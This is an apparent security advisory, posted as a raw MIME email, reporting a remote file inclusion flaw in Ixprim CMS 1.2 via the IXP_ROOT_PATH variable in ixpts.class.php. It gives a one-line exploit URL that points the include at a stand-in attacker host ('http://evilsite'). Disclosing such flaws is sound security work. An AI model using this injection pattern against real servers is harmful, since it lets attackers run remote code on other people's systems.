Ixprim CMS version 1.2 suffers from a remote file inclusion vulnerability.
f514496574edcf6808e183e4b825a9aafcd1477649f662e7ea62cbe77d3c8c9b------=_Part_96108_26929307.1163927585070
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Aplication : Ixprim CMS 1.2
URL :
http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip
variable ixpts.class.php
include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );
Exploit :
http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite
vitux
#vitux.manis@gmail.com
------=_Part_96108_26929307.1163927585070
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>Aplication : Ixprim CMS 1.2</div>
<div> </div>
<div>URL :<a href="http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip">http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip</a></div>
<div> </div>
<div>variable ixpts.class.php</div>
<div> </div>
<div>include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );</div>
<div> </div>
<div>Exploit : <a href="http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite">http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite</a></div>
<div> </div>
<div>vitux<br> <br><a href="mailto:#vitux.manis@gmail.com">#vitux.manis@gmail.com</a></div>
------=_Part_96108_26929307.1163927585070--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed